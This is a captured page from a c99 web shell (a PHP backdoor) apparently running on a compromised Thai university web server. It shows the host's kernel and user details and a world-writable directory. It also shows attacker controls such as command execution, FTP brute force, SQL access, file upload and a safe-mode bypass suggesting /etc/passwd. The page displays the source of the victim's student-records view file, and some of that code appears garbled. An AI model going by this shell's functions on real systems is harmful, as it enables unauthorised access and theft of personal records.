!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_showStudentDetails.php (3.3 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_cfg 
= (isset($qu_cfg) && $qu_cfg!=NULL) ? $qu_cfg->row() : NULL;
$row_std = (isset($qu_std) && $qu_std->num_rows()) ? $qu_std->row() : NULL;
$row_ctc = (isset($ctc) && $ctc->num_rows()) ? $ctc->row() : NULL;
$row_adv = (isset($adv) && $adv->num_rows()) ? $adv->row() : NULL;
?>
<table class="szone">
    <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
        <td class="coltd_szone">รหัสนักศึกษา</td>
        <td><?php echo setValue('stdCode',$row_std);?></td>
        <td class="coltd_szone2">รหัสบัตรประจำตัวประชาชน</td>
        <td><?php echo setValue('sdtCitizenId',$row_std);?></td>
        <td rowspan="8" valign="absolute" align="center">
        <img src="<?php echo base_url().$this->config->item('rg_pictureStd').setValue('sdtPicturePath',$row_std);?>" width="100" height="115" /></td>
    </tr>
    <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
        <td class="coltd_szone">ชื่อ-นามสกุล</td>
        <td><?php echo setValue('prefisName',$row_std).setValue('stdName',$row_std).' '.setValue('stdSurname',$row_std);?></td>
        <td class="coltd_szone2">ระดับการศึกษา</td>
        <td><?php echo setValue('levelName',$row_std);?></td>
    </tr>
    <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
        <td class="coltd_szone">หลักสูตร</td>
        <td><?php echo setValue('curName',$row_std);?></td>
        <td class="coltd_szone2">ชั้นปีที่</td>
        <td><?php echo setValue('syCode',$row_std);?></td>
    </tr>
    <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
        <td class="coltd_szone">สถานะนักศึกษา</td>
        <td><?php echo setValue('sstName',$row_std);?></td>
        <td class="coltd_szone2">ภาค/ปีการศึกษาที่เข้า</td>
        <td><?php echo setValue('tmCode',$row_std).'/'.setValue('stdAdY',$row_std).' (รุ่นที่ '.setValue('genNo',$row_std).')';?></td>
    </tr>
    <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
        <td class="coltd_szone">GPA</td>
        <td><?php echo number_format(setValue('stdGPA',$row_std),2);?></td>
        <td class="coltd_szone2">เจ้าของทุน</td>
        <td><?php echo setValue('soName',$row_std);?></td>
    </tr>
    <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
        <td class="coltd_szone">ทุนจังหวัด</td>
        <td><?php echo setValue('provinceName',$row_std);?></td>
        <td class="coltd_szone2">ประเภททุน</td>
        <td><?php echo setValue('etName',$row_std).(setValue('stdEt2Id',$row_std)==' ('.setValue('et2Name',$row_std).')' '');?></td>
    </tr>
    <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
        <td class="coltd_szone">อาจารย์ประจำชั้น</td>
        <td><?php echo (setValue('prsNames',$row_ctc)=='') ? '-' setValue('prsNames',$row_ctc);?></td>
        <td class="coltd_szone2">อาจารย์ที่ปรึกษา</td>
        <td><?php echo (setValue('prsNames',$row_adv)=='') ? '-' setValue('prsNames',$row_adv);?></td>
    </tr>
    <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
        <td class="coltd_szone">คะแนนความประพฤติ</td>
        <td colspan="3"><?php echo setValue('stdTotalPoint',$row_std);?></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0065 ]--